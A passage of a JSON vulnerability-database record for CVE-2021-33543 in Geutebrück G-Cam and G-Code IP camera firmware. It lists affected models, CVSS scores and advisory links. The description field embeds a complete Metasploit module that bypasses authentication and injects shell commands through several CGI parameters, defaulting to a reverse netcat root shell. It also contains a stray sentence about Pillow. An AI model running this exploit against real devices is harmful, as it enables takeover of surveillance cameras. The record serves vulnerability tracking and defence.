"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33543"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2095"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33543",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-33543",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2021-33543",
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2021-33543",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33543",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33543",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2095",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2021-33543",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-33543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2095"
},
{
"db": "NVD",
"id": "CVE-2021-33543"
},
{
"db": "NVD",
"id": "CVE-2021-33543"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple camera devices by UDP Technology, Geutebr\u00fcck and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 \u2025 * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 \u2025 * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 \u2025 * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 \u2025 * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 \u2025 * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 \u2025 * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Geutebruck Multiple Remote Command Execution\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder\n and exploits multiple authenticated arbitrary command execution vulnerabilities within\n the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx,\n EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions \u003c= 1.12.0.27 as\n well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in\n remote code execution as the root user. \n },\n\n \u0027Author\u0027 =\u003e [\n \u0027Titouan Lazard\u0027, # Of RandoriSec - Discovery\n \u0027Ibrahim Ayadhi\u0027, # Of RandoriSec - Discovery and Metasploit Module\n \u0027S\u00e9bastien Charbonnier\u0027 # Of RandoriSec - Metasploit Module\n ],\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027References\u0027 =\u003e [\n [\u0027CVE\u0027, \u00272021-33543\u0027],\n [\u0027CVE\u0027, \u00272021-33544\u0027],\n [\u0027CVE\u0027, \u00272021-33548\u0027],\n [\u0027CVE\u0027, \u00272021-33550\u0027],\n [\u0027CVE\u0027, \u00272021-33551\u0027],\n [\u0027CVE\u0027, \u00272021-33552\u0027],\n [\u0027CVE\u0027, \u00272021-33553\u0027],\n [\u0027CVE\u0027, \u00272021-33554\u0027],\n [ \u0027URL\u0027, \u0027http://geutebruck.com\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],\n [ \u0027URL\u0027, \u0027https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-07-08\u0027,\n \u0027Privileged\u0027 =\u003e true,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD],\n \u0027Targets\u0027 =\u003e [\n [\n \u0027CVE-2021-33544 - certmngr.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027createselfcert\u0027,\n \u0027local\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027country\u0027 =\u003e Rex::Text.rand_text_alphanumeric(2),\n \u0027state\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027,\n \u0027organization\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33543"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33543",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2095",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33543",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2095"
},
{
"db": "NVD",
"id": "CVE-2021-33543"
}
]
},
"id": "VAR-202109-0596",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:03:15.617000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for access control error vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=157940"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2095"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33543"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.7,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/306.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2095"
},
{
"db": "NVD",
"id": "CVE-2021-33543"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33543"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2095"
},
{
"db": "NVD",
"id": "CVE-2021-33543"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-09-13T00:00:00",
"db": "VULMON",
"id": "CVE-2021-33543"
},
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2095"
},
{
"date": "2021-09-13T18:15:19.693000",
"db": "NVD",
